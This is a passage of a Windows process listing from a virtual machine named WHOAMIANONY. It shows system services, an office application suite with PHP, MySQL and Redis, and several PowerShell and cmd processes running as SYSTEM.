 2016  492   vmtoolsd.e  x64   0        NT AUTHORITY\SYS  C:\Program Files\
             xe                         TEM               VMware\VMware Too
                                                          ls\vmtoolsd.exe
 2092  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2192  492   SearchInde  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             xer.exe                    TEM               32\SearchIndexer.
                                                          exe
 2208  612   WmiPrvSE.e  x64   0        NT AUTHORITY\NET  C:\Windows\system
             xe                         WORK SERVICE      32\wbem\wmiprvse.
                                                          exe
 2368  492   msdtc.exe   x64   0        NT AUTHORITY\NET  C:\Windows\System
                                        WORK SERVICE      32\msdtc.exe
 2436  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2468  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2476  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2484  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2492  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2500  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2508  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2516  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2532  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2540  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2544  3308  iexplore.e  x86   1        WHOAMIANONY\Admi  C:\Program Files
             xe                         nistrator         (x86)\Internet Ex
                                                          plorer\iexplore.e
                                                          xe
 2640  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2656  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2672  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2688  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2704  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 2720  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 2968  492   OfficeTask  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             .exe                       TEM               eTask.exe
 2988  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 3040  492   dllhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\dllhost.exe
 3204  492   mysqld.exe  x64   0        NT AUTHORITY\SYS  C:\MYOA\mysql5\bi
                                        TEM               n\mysqld.exe
 3208  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 3324  492   sppsvc.exe  x64   0        NT AUTHORITY\NET  C:\Windows\system
                                        WORK SERVICE      32\sppsvc.exe
 3368  492   taskhost.e  x64   1        WHOAMIANONY\bunn  C:\Windows\system
             xe                         y                 32\taskhost.exe
 3432  1440  redis-serv  x64   0        NT AUTHORITY\SYS  C:\MYOA\bin\redis
             er64.exe                   TEM               -server64.exe
 3460  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 3484  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 3496  3768  cmd.exe     x64   1        WHOAMIANONY\bunn  C:\Windows\system
                                        y                 32\cmd.exe
 3580  492   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\System
             e                          TEM               32\svchost.exe
 3744  848   dwm.exe     x64   1        WHOAMIANONY\bunn  C:\Windows\system
                                        y                 32\Dwm.exe
 3768  3736  explorer.e  x64   1        WHOAMIANONY\bunn  C:\Windows\Explor
             xe                         y                 er.EXE
 3840  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 3856  3768  vmtoolsd.e  x64   1        WHOAMIANONY\bunn  C:\Program Files\
             xe                         y                 VMware\VMware Too
                                                          ls\vmtoolsd.exe
 3872  492   svchost.ex  x64   0        NT AUTHORITY\NET  C:\Windows\system
             e                          WORK SERVICE      32\svchost.exe
 3996  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 4048  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 4164  492   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\system
             e                          AL SERVICE        32\svchost.exe
 4192  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 4196  492   OfficeIm.e  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             xe                         TEM               eIm.exe
 4300  492   OfficeMail  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             .exe                       TEM               eMail.exe
 4376  492   OfficeInde  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             x.exe                      TEM               eIndex.exe
 4436  492   OfficePOP3  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             .exe                       TEM               ePop3.exe
 4504  1348  cmd.exe     x86   0        NT AUTHORITY\SYS  C:\Windows\SysWOW
                                        TEM               64\cmd.exe
 4536  492   OfficeMQ.e  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             xe                         TEM               eMQ.exe
 4576  4536  OfficeWork  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             er.exe                     TEM               eWorker.exe
 4584  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 4616  4748  powershell  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             .exe                       TEM               32\WindowsPowerSh
                                                          ell\v1.0\powershe
                                                          ll.exe
 4652  492   OfficeDaem  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             on.exe                     TEM               eDaemon.exe
 4748  1780  powershell  x86   0        NT AUTHORITY\SYS  C:\Windows\SysWOW
             .exe                       TEM               64\WindowsPowerSh
                                                          ell\v1.0\powershe
                                                          ll.exe
 4900  732   powershell  x86   0        NT AUTHORITY\SYS  C:\Windows\SysWOW
             .exe                       TEM               64\WindowsPowerSh
                                                          ell\v1.0\powershe
                                                          ll.exe